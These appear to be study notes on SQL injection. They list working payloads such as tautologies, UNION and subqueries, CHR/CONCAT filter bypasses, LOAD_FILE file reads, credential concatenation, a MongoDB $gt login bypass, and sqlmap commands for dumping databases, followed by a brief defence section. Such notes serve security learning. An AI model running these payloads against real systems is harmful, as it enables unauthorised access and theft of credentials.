
Inserting arbitrary information that breaks the handling code in the server

SQLi (SQL Injection)

ie x' or '1'='1

SELECT * FROM users WHERE password = ' x' or '1'='1 '


Do not DOS!

Limit the amount of data you fetch, as you may accidentally perform a Denial of Service.


  • Add your own string escapes to your string to break the code
  • Add comments (--) after the string escape to disable other parts of the SQL query


`SELECT * FROM users WHERE username LIKE 'admi%';

SELECT TOP 10 * FROM Articles WHERE Content LIKE '%_[^!_%/%a?F%_D)_(F%)_%([)({}%){()}£$&N%_)$*£()$*R"_)][%](%[x])%a][$*"£$-9]_%'

OOB - Out of Band Injection

When the attacker is unable to use the same channel to both launch and gather results

Sometimes we may have to perform a blind injection, and will be unable to gather verbose results.
(Or there maybe an outbound Web Application Firewall).

OOB injection relies on the dbms making a DNS/HTTP request to deliver data to an attacker

i.e. MySQL

  • select @@secure_file_priv

NULL -> Disabled
'/directory' -> Restricted import
Default of "" on MySQL < 5.5.53

  • SELECT * INTO outfile '//'

OS-Interative Databases

If the database access files for ETL (extract, transform, load) operations, there may be vulnerabilities which allow us to read and write into the OS

  • LOAD DATA INFILE 'data.txt' INTO TABLE db2.my_table;
  • SELECT LOAD_FILE('/tmp/world') AS world;

It may even be possible to execute shell commands


Make a query inside of a query

  • Select * from users where isAdmin = (select isAdmin from permissions);
  • Select user,password from users where username='injectionpoint' union select (select permissions from users limit 1), 'asdf';

Union by Copypaste


SQL Functions

  • CHR()
  • CAST()
  • CONCAT()

These may help you to bypass WAFs/Filters, extract more content, bypass type constraints.

i.e. if 'admin' is blacklisted -> CONCAT(chr(0x61), chr(0x64), ...)

i.e exfil information -> SELECT CONCAT(username,"|",password) FROM users`

i.e to bypass type constraints -> CAST(id as VARCHAR)


Which DBMS are we using?

i.e. @@Version, Version(), sqlite_version()

For boolean based injections, we could use substr(version(), 1, 1)=5 to check if the server version is 5.xx

Probing for Vulnerabilities

To find possible vulnerabilities, we want to find error/verbose messages that respond to our input.
This allows us to figure out what attack vectors we can try.

A 'magic string' is a piece of text which contains several possible attack-vectors to probe if a server is vulnerable to SQLi



sqlmap is a tool to automatically perform SQL queries - to fuzz for injection vulnerabilities.

It attempts to identify the database type, and then performs database-specific vectors

  • ./sqlmap -r file.txt --dbms=mySQL
  • ./sqlmap -r file.txt --dbs - Get databases
  • ./sqlmap -r file.txt --dbs --tables - Get databases and tables


  • db.users.find({username: username, password: password})
  • db.users.find({username: username, 'password': {'$gt': ""}})

Defending against SQLi

  • Parameterised Queries - Don't just perform a simple concatenation or string replacement
    • Don't just trust the people who wrote parameterised query libraries